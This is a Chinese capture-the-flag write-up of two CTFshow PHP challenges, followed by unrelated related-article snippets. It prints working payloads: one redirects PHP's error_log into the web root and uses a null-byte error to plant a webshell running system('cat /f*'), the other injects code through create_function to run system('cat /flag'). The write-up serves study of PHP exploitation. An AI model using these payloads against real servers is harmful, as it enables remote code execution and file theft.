CTFshow 限时活动 红包挑战7、红包挑战8
CTFshow红包挑战7
写不出来一点,还是等了官方wp之后才复现。
直接给了源码
<?php
highlight_file(__FILE__);
error_reporting(2);extract($_GET);
ini_set($name,$value);system("ls '".filter($_GET[1])."'"
);function filter($cmd){$cmd = str_replace("'","",$cmd);$cmd = str_replace("\\","",$cmd);$cmd = str_replace("`","",$cmd);$cmd = str_replace("$","",$cmd);return $cmd;
}
extract:从数组中将变量导入到当前的符号表
ini_set:为一个配置选项设置值(我们可以修改配置项)
报错等级是2。他限定只能使用ls 什么什么,而且filter自定义函数过滤了'、 \ 、`` 、$这四个字符。不好使用闭合来绕过对getshell`的限制。
既然ls 什么什么里面的什么什么可以控制,那就先遍历目录来看看吧。
?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731/
当前环境存在5个扩展,包含xdebug。分别是mysqli.so opcache.so pdo_mysql.so sodium.so xdebug.so。
PHP版本是7.3.22
输入?1=/,服务端内部语句拼接为ls '/'。返回了根目录下所有文件。
flag应该就在flag文件中
开始思索题目。感觉关键代码是这三句:
//不同寻常的报错等级
error_reporting(2);//修改$name,$value
extract($_GET);//开启某个配置项
ini_set($name,$value);
程序执行期间的ini_set不能disable_functions,无法直接禁用str_replace函数
知识点:
xdebug在处理截断问题的时候,会将异常payload回显。而system刚好可以用0字节(%00或者\000)进行截断来触发异常。
思路:
通过触发异常后,将回显的内容(可控)写入到web目录(修改配置项,把报错写入自定义报错日志)。即可实现写马到文件。
ini_set("display_errors", "On");//打开错误提示,与题目无关,只是扩展
ini_set("error_reporting",E_ALL);//显示所有错误,与题目无关,只是扩展ini_set("error_log",""/var/www/html/1.php");
//把报错信息写入web目录下的1.php文件中
尝试看看报错,%00确实能截断导致报错。
payload:
?name=error_log&value=/var/www/html/1.php&1=%00<?php system("cat /f*");?>
可以发现,报错已经写入自定义的报错日志,同时,报错代码被自动执行了。
此外,官方wp还给了一种造成报错的方法:
/?name=error_log&value=1.php
&1=("%0C%08%00%00"^"`{ %2f")<?php system("cat /*");?>
("%0C%08%00%00"^"`{ %2f")即EKc ^URL编码后EKc%20%02^
但是直接
?name=error_log&value=1.php
&1=EKc%20%02^<?php system("cat /*");?>
是无法造成报错的,这种造成报错方式有待细细研究。
CTFshow红包挑战8
考点:PHP create_function
扩展练习(相关题目):NSS [NISACTF 2022]level-up
源码直接给了。
<?phphighlight_file(__FILE__);
error_reporting(0);extract($_GET);
create_function($name,base64_encode($value))();
?>
create_function($name,base64_encode($value))();相当于创建匿名函数后直接执行。就像nmhs();这样。
其中,$name是参数,base64_encode($value)是要执行的代码段,但是这里base64编码过了,执行不了。
可以看作如下代码:(片段1)【一定要当作函数片段来看,而不是一行有参数的函数调用】
nmhs($name){base64_encode($value)
}
那我就不要base64_encode($value),直接从$name开始构造。
先看看payload:
?value=Jay17&name=){}phpinfo();/*
我们把payload中$name带入片段1。
片段1:
nmhs($name){base64_encode($value)
}
带入$name
nmhs(){}phpinfo();/*){base64_encode($value)
}
整理一下
nmhs(){}phpinfo();
/*){base64_encode($value)
}
最终payload:
?value=Jay17&name=){}system("cat /flag");/*
相关文章:
CTFshow 限时活动 红包挑战7、红包挑战8
CTFshow红包挑战7 写不出来一点,还是等了官方wp之后才复现。 直接给了源码 <?php highlight_file(__FILE__); error_reporting(2);extract($_GET); ini_set($name,$value);system("ls ".filter($_GET[1])."" );function filter($cmd){$cmd…...
Redis使用Lua脚本和Redisson来保证库存扣减中的原子性和一致性
文章目录 前言1.使用SpringBoot Redis 原生实现方式2.使用redisson方式实现3. 使用RedisLua脚本实现3.1 lua脚本代码逻辑 3.2 与SpringBoot集成 4. Lua脚本方式和Redisson的方式对比5. 源码地址6. Redis从入门到精通系列文章7. 参考文档 前言 背景:最近有社群技术交…...
【从零开始学Kaggle竞赛】泰坦尼克之灾
目录 0.准备1.问题分析挑战流程数据集介绍结果提交 2.代码实现2.1 加载数据2.1.1 加载训练数据2.1.2 加载测试数据 2.2 数据分析2.3 模型建立与预测 3.结果提交 0.准备 注册kaggle账号后,进入titanic竞赛界面 https://www.kaggle.com/competitions/titanic 进入后界…...
输出无重复的3位数和计算无人机飞行坐标
编程题总结 题目一:输出无重复的3位数 题目描述 从{1,2,3,4,5,6,7,8,9}中随机挑选不重复的5个数字作为输入数组‘selectedDigits’,能组成多少个互不相同且无重复数字的3位数?请编写程》序,从小到大顺序,以数组形式输出这些3位…...
muduo 29 异步日志
目录 Muduo双缓冲异步日志模型: 异步日志实现: 为什么要实现非阻塞的日志...
Qt 对象序列化/反序列化
阅读本文大概需要 3 分钟 背景 日常开发过程中,避免不了对象序列化和反序列化,如果你使用 Qt 进行开发,那么有一种方法实现起来非常简单和容易。 实现 我们知道 Qt 的元对象系统非常强大,基于此属性我们可以实现对象的序列化和…...
)
从零学算法(非官方题库)
输入两棵二叉树A和B,判断B是不是A的子结构。(约定空树不是任意一个树的子结构) B是A的子结构, 即 A中有出现和B相同的结构和节点值。 例如: 给定的树 A:3/ \4 5/ \1 2给定的树 B:4 / 1返回 true,因为 B 与 A 的一个子树拥有相…...
Java # JVM内存管理
一、运行时数据区域 程序计数器、Java虚拟机栈、本地方法栈、Java堆、方法区、运行时常量池、直接内存 二、HotSpot虚拟机对象 对象创建: 引用检查类加载检查分配内存空间:指针碰撞、空闲列表分配空间初始化对象信息设置(对象头内࿰…...
大疆第二批笔试复盘
大疆笔试复盘(8-14) 笔试时候的状态和下来复盘的感觉完全不一样,笔试时脑子是懵的。 (1)输出无重复三位数 题目描述 从 { 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 } \left \{ 1,2,3,4,5,6,7,8,9 \right \...
【Linux】磁盘或内存 占用比较高要怎么排
当 Linux 磁盘空间满了时 请注意,在进行任何删除操作之前,请确保你知道哪些文件可以安全删除,并备份重要文件,以免意外丢失数据。当 Linux 磁盘空间满了时,可以按照以下步骤进行排查: 检查磁盘使用情况&…...
解决xss转义导致转码的问题
一、xss简介 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。跨站脚本攻击ÿ…...
numba 入门示例
一维向量求和: C A B 在有nv 近几年gpu的ubuntu 机器上, 环境预备: conda create -name numba_cuda_python3.10 python3.10 conda activate numba_cuda_python3.10conda install numba conda install cudatoolkit conda install -c nvi…...
BUUCTF 还原大师 1
题目描述: 我们得到了一串神秘字符串:TASC?O3RJMV?WDJKX?ZM,问号部分是未知大写字母,为了确定这个神秘字符串,我们通过了其他途径获得了这个字串的32位MD5码。但是我们获得它的32位MD5码也是残缺不全,E903???4D…...
自定义hook之首页数据请求动作封装 hooks
本例子实现了自定义hook之首页数据请求动作封装 hooks,具体代码如下 export type OrganData {dis: Array<{ disease: string; id: number }>;is_delete: number;name: string;organ_id: number;parent_id: number;sort: number; }; export type SwiperData …...
2023上半年京东手机行业品牌销售排行榜(京东数据平台)
后疫情时代,不少行业都迎来消费复苏,我国智能手机市场在今年上半年也实现温和的复苏,手机市场的出货量回暖。 根据鲸参谋平台的数据显示,2023年上半年,京东平台上手机的销量为2830万,环比增长约4%…...
源码阅读笔记)
lodash之cloneDeep()源码阅读笔记
lodash之cloneDeep()源码阅读笔记 基本上都在写业务代码,没有机会写库,还是想了解一下lodash的库源码是怎么样的,平时用的最多的就是cloneDeep()方法了,终于有空详细看看其中的源码。 本文基于lodash5.0.0版本的源码进行阅读。 /…...
算法模版,今天开始背
二分查找算法 int left_bound(int[] nums, int target) {int left 0, right nums.length - 1;// 搜索区间为 [left, right]while (left < right) {int mid left (right - left) / 2;if (nums[mid] < target) {// 搜索区间变为 [mid1, right]left mid 1;} else if …...
新的 Python URL 解析漏洞可能导致命令执行攻击
Python URL 解析函数中的一个高严重性安全漏洞已被披露,该漏洞可绕过 blocklist 实现的域或协议过滤方法,导致任意文件读取和命令执行。 CERT 协调中心(CERT/CC)在周五的一份公告中说:当整个 URL 都以空白字符开头时&…...
)
react项目做的h5页面加载缓慢优化(3s优化到0.6s)
打包到生产环境时去掉SOURCEMAP 禁用生成 Source Map 是一种权衡,可以根据项目的实际需求和优化目标来决定是否禁用。如果您对调试需求不是特别强烈,可以考虑在生产构建中禁用 Source Map 以获取更好的性能。但如果需要保留调试能力,可以在生…...
如何修复损坏的DOC和DOCX格式Word文件?
我们日常办公中,经常用到Word文档。但是有时会遇到word文件损坏、无法打开的情况。这时该怎么办?接着往下看,小编在这里就给大家带来最简单的Word文件修复方法! 很多时候DOC和DOCX Word文件会无缘无故的损坏无法打开,一…...
Flowable BPMN扩展实战:从自定义属性定义到运行时动态解析
1. 为什么需要自定义BPMN属性? 在真实业务场景中,标准BPMN规范提供的属性往往无法满足复杂流程需求。比如我们团队最近遇到的几个典型case: 会签场景需要标记"最少通过人数"动态指派任务时需要携带"候选人角色白名单"紧急…...
的储能和风电平抑波动研究(Matlab代码实现))
基于多目标哈里斯鹰算法及模型预测控制(MPC)的储能和风电平抑波动研究(Matlab代码实现)
👨🎓个人主页 💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势:🌞🌞🌞博客内容尽量做到思维缜密,逻辑清晰&a…...
)
避坑指南:Ubuntu20.04下用Python3.8搞定Carla 0.9.13预编译版与ROS Bridge(解决卡死问题)
Ubuntu 20.04下Python 3.8与Carla 0.9.13的完美联姻:ROS Bridge避坑全指南 当自动驾驶仿真遇上机器人操作系统,Carla与ROS的集成堪称绝配。但这对黄金搭档的联姻之路却布满荆棘——Python版本冲突、依赖库不兼容、环境变量混乱,每一个坑都可能…...
如何快速实现Brick Design国际化:构建多语言应用的完整指南
如何快速实现Brick Design国际化:构建多语言应用的完整指南 【免费下载链接】brick-design 低代码框架,支持流式布局与自由布局拖拽编排,可视化拖拽、随意嵌套组合、实时渲染、实时辅助线展示、自由布局支持辅助对齐、支持自动吸附、实时组件…...
IA-Lab AI 检测报告生成助手:双碳目标驱动下的检测机构效率引擎,重塑报告生成与合规审核新模式
在“双碳”目标持续推进的时代背景下,绿色发展已从政策导向转变为企业与机构必须面对的现实命题。对于检测认证(TIC)行业而言,这一变化尤为明显——碳排放核算、能源效率评估、环境数据监测等业务需求快速增长,检测报告…...
Vivado收费IP核怎么选?从以太网到视频接口,这份避坑指南帮你省下冤枉钱
Vivado收费IP核选型实战指南:从以太网到视频接口的避坑策略 在FPGA项目开发中,IP核的选择往往决定了整个项目的成败。面对Vivado中琳琅满目的收费IP核,工程师们常常陷入两难:既要确保功能完备,又要控制成本。本文将带你…...
当Texstudio遇见AI:构想一个基于快马平台的智能LaTeX代码助手插件
作为一个长期使用LaTeX撰写学术论文的用户,我经常在Texstudio和各类在线工具之间来回切换。最近尝试了InsCode(快马)平台的AI辅助功能后,突然萌生了一个想法:如果能将AI代码生成能力直接集成到Texstudio里,该有多方便?…...
终极指南:如何构建轻量级Arduino设备与Home Assistant的无缝MQTT集成
终极指南:如何构建轻量级Arduino设备与Home Assistant的无缝MQTT集成 【免费下载链接】arduino-home-assistant ArduinoHA allows to integrate an Arduino/ESP based device with Home Assistant using MQTT. 项目地址: https://gitcode.com/gh_mirrors/ar/ardui…...
- 星盾安全体系与 TEE 可信执行环境交互原理)
16 华夏之光永存:华为破局(架构师级)- 星盾安全体系与 TEE 可信执行环境交互原理
原创:华为破局(架构师级)- 星盾安全体系与TEE可信执行环境交互原理 摘要 本文聚焦鸿蒙星盾安全体系与TEE可信执行环境,拆解全域安全架构、TEE核心特性、二者全流程交互原理,揭示鸿蒙硬件级可信全域防护的底层逻辑&…...
)
Anaconda3 2025 面向数据科学安装教程:详细步骤+自定义路径+Navigator启动)
其包含了conda、Python等180多个科学包及其依赖项。Anaconda可以看做Python的一个集成安装,它不仅免去了许多复杂的环境搭建,还内置了许多使用的Python工具 一、安装准备 安装包下载:https://pan.xunlei.com/s/VOpVUmfa4taHwZ-gAYIVqvCuA1?…...